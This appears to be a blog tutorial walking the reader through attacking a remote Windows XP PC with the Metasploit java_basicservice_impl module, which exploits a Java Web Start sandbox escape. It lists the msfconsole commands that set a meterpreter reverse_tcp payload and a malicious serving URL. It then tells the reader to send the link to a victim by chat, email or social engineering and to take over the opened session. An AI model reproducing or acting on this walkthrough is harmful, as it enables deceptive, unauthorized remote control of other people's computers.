How to Attack on Remote PC through Sun Java Web start Execution

This module exploits vulnerability in Java Runtime Environment that allows an attacker to escape the Java Sandbox. By injecting a parameter into a java’s call within the Basic Service Impl class the default java sandbox policy file can be therefore overwritten. The vulnerability affects version 6 prior to update 22. NOTE: Exploiting this vulnerability causes several sinister-looking popup windows saying that Java is “Downloading application.”

Exploit Targets

Windows XP service pack 2

Windows XP service pack 3

Java 6 Standard Edition prior to update 22

Java 6 Standard Edition Update 10

Java 6 Standard Edition Update 18

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/java_basicservice_impl

Msf exploit ((java_basicservice_impl)>set payload windows/meterpreter/reverse_tcp

Msf exploit (java_basicservice_impl) set lhost 192.168.1.3 (IP of Local Host)

Msf exploit (java_basicservice_impl)>set srvhost 192.168.1.3 (This must be an address on the local machine)

Msf exploit (java_basicservice_impl)>set uripath javabasicservice (The Url to use for this exploit)

Msf exploit (java_basicservice_impl)>exploit

Now an URL you should give to your victim http://192.168.1.3:8080/javabasicsservice

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Leave a Reply

Your email address will not be published. Required fields are marked *